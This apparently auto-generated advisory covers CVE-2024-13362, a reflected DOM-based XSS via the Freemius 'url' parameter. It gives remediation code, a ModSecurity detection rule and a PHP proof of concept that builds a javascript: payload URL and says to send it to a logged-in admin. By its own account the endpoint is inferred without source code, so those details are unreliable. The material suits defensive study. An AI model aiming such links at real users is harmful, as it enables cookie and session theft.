Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 7, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (security-ninja)

Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 5.222
Patched Version:
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK library (versions <= 2.10.1) used by multiple WordPress plugins and themes, including the Security Ninja plugin (vulnerable version 5.222). The vulnerability has a CVSS score of 6.1 (Medium) with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, indicating network exploitation with low complexity, no privileges required, but user interaction is necessary.

The root cause of this vulnerability is improper neutralization of user-supplied input within the 'url' parameter, likely in a JavaScript context that manipulates the DOM directly. Based on the CWE-79 classification and description, the plugin or Freemius SDK receives a 'url' parameter, fails to sanitize it properly, and injects it into the page without HTML or JavaScript context escaping. Since Atomic Edge analysis is metadata-based without access to source code, we infer that the vulnerable code resides in a JavaScript file that reads from a query string or POST parameter and writes it into the DOM (e.g., via innerHTML or document.write). This is consistent with DOM-based XSS, where the attack payload never reaches the server but executes in the client's browser.

Exploitation requires an unauthenticated attacker to craft a malicious link containing a JavaScript payload in the 'url' parameter. For example, an attacker could construct a URL like: https://target-site.com/wp-admin/admin-ajax.php?action=freemius_connect&url=javascript:alert(document.cookie) or similar. The Freemius SDK's JavaScript handler would then process this parameter and write it unsafely into the page. Since the vulnerability is reflected and DOM-based, the attacker must trick a user into clicking the crafted link. The attack can bypass traditional server-side XSS filters because the payload is never sent to the server for processing; it is only reflected through the client-side URL fragment or query string.

Remediation likely requires the vendor to apply proper output encoding when inserting the 'url' parameter into the DOM. Since the vulnerability is in client-side JavaScript, the fix should use textContent or safer DOM manipulation methods instead of innerHTML, or apply context-appropriate encoding (e.g., encodeURIComponent for URL components) before inserting user-controlled data into the page. Server-side, the parameter should be validated as a URL (e.g., filter_var with FILTER_VALIDATE_URL) and output-escaped using WordPress's esc_url or esc_js functions before being passed to JavaScript.
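The unsafe DOM write described above beside the hardened form the remediation paragraph recommends, as an added example in browser JavaScript; this is not Freemius SDK or Atomic Edge code, and the function names and the ALLOWED_SCHEMES list are assumptions.

```javascript
// Added example (not Freemius SDK or Atomic Edge code); the handler names are hypothetical.
// Only http(s) connect URLs are accepted; javascript:, data: and vbscript: are rejected.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// VULNERABLE pattern described in the analysis: the raw 'url' value is concatenated
// into markup, so the browser parses attacker-controlled text as HTML/JS.
function renderConnectLinkUnsafe(container, rawUrl) {
  container.innerHTML = '<a href="' + rawUrl + '">' + rawUrl + '</a>';
}

// Hardened validation: parse with the URL API (throws on relative or malformed
// input) and allow only http(s). Returns the normalized URL string or null.
function validateConnectUrl(rawUrl) {
  if (typeof rawUrl !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(rawUrl);
  } catch (e) {
    return null;
  }
  // protocol is already lower-cased by the parser, so "JavaScript:" is caught too
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Hardened rendering: href is set via setAttribute and link text via textContent,
// so nothing user-controlled is ever parsed as markup. Returns true when rendered.
function renderConnectLinkSafe(container, rawUrl) {
  const safe = validateConnectUrl(rawUrl);
  container.textContent = '';            // clears children without parsing HTML
  if (safe === null) {
    container.textContent = 'Invalid connect URL';
    return false;
  }
  const a = container.ownerDocument.createElement('a');
  a.setAttribute('href', safe);
  a.setAttribute('rel', 'noopener noreferrer');
  a.textContent = safe;
  container.appendChild(a);
  return true;
}

// DOM-based XSS input: the parameter is read from the page's own query string
// (location.search) and never has to reach the server.
function connectUrlFromQuery(search) {
  return new URLSearchParams(search).get('url');
}
```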

If exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim's browser on the affected WordPress site. This can lead to session hijacking, theft of authentication cookies, defacement of the page, or redirection to malicious sites. The impact is limited by the requirement for user interaction (clicking a link), but the scope change in CVSS (S:C) indicates the injected script can affect resources beyond the vulnerable component. Atomic Edge research confirms that this is a medium-severity issue that should be patched promptly.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# This rule blocks reflected DOM-based XSS attempts targeting the Freemius SDK's 'url' parameter.
# The rule matches the exact endpoint and parameter name to minimize false positives.
# REQUEST_FILENAME (path only) is used rather than REQUEST_URI, which includes the query
# string and therefore never satisfies @streq once ?action=...&url=... is present.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via Freemius url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
    SecRule ARGS_GET:action "@streq freemius_connect" "chain"
        # Match a dangerous scheme at the start of the value or an inline event handler (onXXX=),
        # not any bare 'on' substring, which would block ordinary URLs such as /content/.
        SecRule ARGS_GET:url "@rx (?:^\s*(?:javascript|data|vbscript)\s*:|on[a-z]+\s*=)" \
            "t:none,t:lowercase,t:urlDecodeUni"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// (The opening <?php tag sits above this header so the comment block is not
// echoed to the terminal as literal text.)

// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates how an attacker could craft a malicious URL that, when visited by a victim,
// triggers DOM-based XSS in the Freemius SDK's handling of the 'url' parameter.
// Since no source code is available, the endpoint is inferred from common Freemius patterns.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

// Single-quoted outer string so the inner double quotes need no escaping.
$payload = 'javascript:alert("XSS_by_Atomic_Edge")';

// Construct the malicious URL. The endpoint /wp-admin/admin-ajax.php with action 'freemius_connect'
// is a common Freemius handler. The 'url' parameter is injected into the DOM.
$exploit_url = sprintf(
    '%s/wp-admin/admin-ajax.php?action=freemius_connect&url=%s',
    rtrim($target_url, '/'),
    urlencode($payload)
);

echo "[+] Atomic Edge CVE-2024-13362 PoC\n";
echo "[+] Target: $target_url\n";
echo "[+] Crafted exploit URL:\n";
echo "$exploit_url\n\n";
echo "[+] Instructions: Send this link to a logged-in admin. When clicked, the JavaScript alert will execute.\n";
echo "[!] Note: Actual exploitation depends on the presence of the Freemius SDK and the specific vulnerable handler.\n";

// Optionally, use cURL to simulate a request to verify the parameter is reflected (for server-side reflection)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // lab use only: disables TLS certificate verification
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Server response HTTP code: $http_code\n";
if ($http_code === 200) {
    echo "[+] Request succeeded. Check if the 'url' parameter is reflected in the response (for server-side reflection).\n";
} else {
    echo "[!] Unexpected response code. The endpoint may differ.\n";
}
?>
